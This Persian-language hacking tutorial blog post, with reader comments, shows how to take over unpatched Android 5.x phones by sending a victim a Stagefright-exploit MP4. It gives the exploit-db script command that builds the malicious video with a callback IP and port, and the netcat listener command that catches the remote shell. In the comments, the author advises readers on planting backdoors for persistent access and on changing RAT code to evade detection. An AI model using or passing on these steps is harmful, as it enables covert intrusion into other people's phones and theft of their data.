نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو

نفوذ به اندروید

اموزش نفوذ به اندروید فقط با ارسال یک ویدیو (فرمت MP4) و با استفاده از اسیب پذیری Stagefright با ما در ادامه این اموزش هک و امنیت همراه باشید

نفوذ به اندروید با ارسال ویدیو و امنیت

سیستم عامل اندروید یکی از بهترین و محبوب ترین سیستم عامل های موبایل در جهان است به همین دلیل متخصصان امنیتی زیادی
بر روی امنیت اندروید کار میکنند اما اسیب پذیری هایی وجود دارند که بعد از انتشار اخرین نسخه منتشر میشوند تا هر چه سریع تر نسبت به رفع ان اقدام شود
بسیاری بعد از تهیه دستگاه اندرویدی خود اقدام به اپدیت و رفع این اسیب پذیری ها نمیکنند
یا شرکت های تولید کننده اپدیتی برای دستگاه قدیمی یا جدید ارائه نمیدهند 
پس اسیب پذیری در بسیاری از دستگاه ها باقی میمانند و هکرا با استفاده از ان حفره های امنیتی اقدام به نفوذ میکنند
یکی از این اسیب پذیری های خطرناک به نام Stagefright است که نفوذگر میتواند با ارسال یک ویدیو به کاربر دسترسی کنترل از راه ذور بگیرد 
که در ادامه با نحوه استفاده با این حفذره امنیتی اشنا میشوید
 

اسیب پذیری Stagefright

Stagefright یک حفره امنیتی در سیستم عامل اندرید از نوع باگ RCE است 
که همانطور که گفته شد با اجرای یک فایل ویدیو ای با پسورند .mp4 دسترسی کنترل از راه دور به نفوذگر میدهد
اکسپلویت این اسیب پذیری به صورت عمومی منتشر شده است و میتواند اندروید 5.0 < 5.1.1 را مورد نفوذ قرار دهد
میتوانید فایل اکسپلویت را از اخر اموزش به صورت مستقیم دانلود کنید یا از سایت exploit-db.com دریافت کنید
نکته : در این اموزش برای نفوذ به اندروید از لینوکس استفاده میکنیم اما میتوانید با نصب پایتون در هر سیستم عاملی مانند ویندوز استفاده کنید
وارد ترمینال شوید و به مسیری که فایل پایتون اکسپلویت را قرار داده اید بروید
حال اکسپلویت را اجرا کنید تا سویچ ها و راهنمای ان را ببینید

python 38124.py

نفوذ به اندروید با ارسال ویدیو

ساخت فایل الوده MP4

حال برای ساخت فایل ویدیو ای الوده به دستور زیر توجه کنید

python 38124.py -c 127.0.0.1 -p 6060 -o PentestCore.mp4

نفوذ به اندروید step 2
با استفاده از python فایل اکسپلویت 38124.py را اجرا کرده ایم 
با سویچ -c ادرس ip سرور خود که میخواهید اتصال دستگاه کلاینت به ان برقرار شود را وارد کنید
یک پورت شبکه را برای اتصال به دلخواه انتخاب کنید ما با استفاده از سویچ -p پورت 6060 را انتخاب کرده ایم
و برای گرفتن خروجی سویچ -o را وارد کنید و سپس نام فایل را با فرمت .mp4 وارد کنید
که ما PentestCore.mp4 وارد کرده ایم این فایل خروجی است که باید به کلاینت خود بدهید تا اجرا کنید
بعد از اجرا فایل ساخته شده توسط کاربر نفوذ به اندروید انجام شده و اتصال به سرور شما بر قرار میشود 
برای برقراری این اتصال باید پورت 6060 را که انتخاب کرده بودید در سرور خود باز کنید و منتظر اجرای ویدیو توسط کلاینت شوید 
NC ابزاری مناسب برای باز کردن پورت است که در کالی لینوکس به صورت پیشفرض وجود دارد 
میتوانید اموزش استفاده از نت کت (nc) را در PentestCore مشاهده کنید
در nc را با سویچ های زیر اجرا کنید تا پروت مورد نظر شما بر روی سیسستم باز شود

nc -v -l -p 6060

نفوذ به اندروید step 3
بعد از اجرای فایل ویدو ای دستگاه به صورت ریموت به سرور شما از طریق nc متصل میشود و میتوانید دستورات خود را بر روی دستگاه وارد کنید
 

  باج افزار واناکرای از بین نرفته است

آموزش ویدیو ای


 

دریافت لینک دانلود



[ برای دریافت فایل وارد شوید و یا ثبت نام کنید! ]

امیدواریم از این اموزش نفوذ به اندروید لذت برده باشید
موفق باشید. 

5/5 ( 1 نظر )

۱۸ دیدگاه در “نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو”

  • سینا نادری اسفند ۲۶, ۱۳۹۷ پاسخ

    سلام یه سوال داشتم در رابطه با رات های اندرویدی
    آیا راهی هست که گوشی نتونه رات رو شناسایی کنه چون هنگام نصب رات مثل اسپای نوت گوشی پیغام میده که برنامه مخربه و به دستگاه آسیب میزنه

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود
      بله راه هایی وجود دارد که باید برنامه نویسی بلد باشید و تغیراتی در کد نویسی فایل دهید

  • milani97 اسفند ۲۷, ۱۳۹۷ پاسخ

    سلام من مراحل بالا رو به ترتیب انجام دادم ولی وقتی دستور sudo python 38124.py رو اجرا میکنم خطای زیر رو نشون میده
    با ابونتو البته تست کردم
    File “38124.py”, line 8
    SyntaxError: Non-ASCII character ‘\xe2’ in file 38124.py on line 8, but no encoding declared; see python. org/dev/peps/pep-0263/ for details

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود
      فایل را به صورت مستقیم از PentestCore دریافت کنید و نام ان را به mp4.py تغیر بدین مشکل حل میشود
      اموزش ویدیو ای را حتما مشاهده کنید تمام این نکات گفته شده
      موفق باشید

  • rootkali52 اسفند ۲۸, ۱۳۹۷ پاسخ

    سلام خسته نباشید.. همون چیزایی که گفتید انجام دادم ولی کار نکرد.. برا طرفم فرستادم

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود تشکر از شما
      احتمالا دستگاه اندرویدی طرف مقابل شما از اندروید ۵ استفاده نمیکند داخل اموزش گفته شده دقیقا چه نسخه هایی از اندروید این اسیب پذیری را دارند
      و یا احتمالا مشکل ip دارید باید از سرور مجازی استفاده کنید یا پورت فورواردیتگ انجام دهید

  • 563694 اردیبهشت ۳, ۱۳۹۸ پاسخ

    سلام اموزش رو نمیشه با تروموکس انجام داد؟

    • Nima Nani اردیبهشت ۶, ۱۳۹۸ پاسخ

      درود
      اگر مشکل اتصال نداشته باشید میتوانید داخل ترموکس هم انجام دهید

  • علی اردیبهشت ۵, ۱۳۹۸ پاسخ

    این برای لینوکسه توی تروموکس نمیشه ازش استفاده کرد؟؟؟؟

    • Nima Nani اردیبهشت ۶, ۱۳۹۸ پاسخ

      درود
      اگر مشکل شبکه و اتصال نداشته باشید میتوانید در ترموکس هم انجام دهید

  • 563694 اردیبهشت ۸, ۱۳۹۸ پاسخ

    سلام داداش منظورت از (مشکل شبکه و اتصال نداشته باشید) چیه؟ برای استفاده در تروموکس؟

    • Nima Nani اردیبهشت ۱۲, ۱۳۹۸ پاسخ

      درود
      شما باید ای پی ثابت داشته باشید و شبکه شما به صورت bridge باشد که در دستگاه های خانگی به این صورت نمیباشد

  • Root خرداد ۲۰, ۱۳۹۸ پاسخ

    سلام و خسته نباشید میخواستم بدونم کد کی بخوام از داخل گوشی اون کسی که هک شده بکشم بیرون چجوری باید تو لینوکس وارد کنم ممنون میشم جوابم را بدید

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      بعد از دسترسی میتوانید بکدور خود را بریزید و دسترسی کامل بگیرید. منظورتون از کد خیلی ناواضح است

  • علی تیر ۱۵, ۱۳۹۸ پاسخ

    سلام ببخشید چطور میشه اتصال رو بعد از خاموش کردن کالی حفظ کرد

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      میتوانید برای اتصال دائم یک بکدور بر روی دستگاه بگذارید تا بتوانید به صورتی که میخواهید با هر سیستمی متصل شوید

  • mohammad تیر ۳۰, ۱۳۹۸ پاسخ

    سلام خسته نباشید .
    میشه ازتون خواهش کنم که آموزش کامل مرحله به مرحله تا زمانیکه اتصال دائم میگیرید رو اموزش بدید.مبحث پورت فورواردینگ و بکدور خیلی مهمه
    ایا میشه از Ngrok برای پورت فورواردینگ استفاده کرد و اینکه اگه میشه از کدوم حالت http یاtcp
    واینکه این باگ هنوزم کار میکنه حتی اگه نسخه اندروید ۵ یا ۵.۱ باشه

    • Nima Nani مرداد ۲۶, ۱۳۹۸ پاسخ

      درود تشکر
      بله در صورت امکان این اموزش را قرار خواهیم داد
      بله این باگ در نسخه های پچ نشده اندروید ۵ و ۵.۱ همچنان کار میکند

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مطالب مرتبط

سیستم عامل هک

سیستم عامل هک و امنیت بر پایه Ubuntu

در این آموزش می خواهیم که دو تا از سیستم عامل های هکر ها را معرفی کنیم که بر پایه لینوکس اوبونتو هستند باما در ادامه این آموزش هک و امنیت همراه باشید 0/5 ( 0 نظر )   ساخت کیلاگر با ابزار BeeLogger و امنیت

اموزش تست نفوذ

اموزش تست نفوذ وبسایت با ابزار WAES

اموزش تست نفوذ وبسایت با استفاده از ابزار اسکنر اتوماتیک WAES برای جستجو انواع اسیب پذیری ها با ما در ادامه این اموزش هک و امنیت همراه باشید. 0/5 ( 0 نظر )   اموزش اسکن اسیب پذیری SQL INJECTION با ابزار White Widow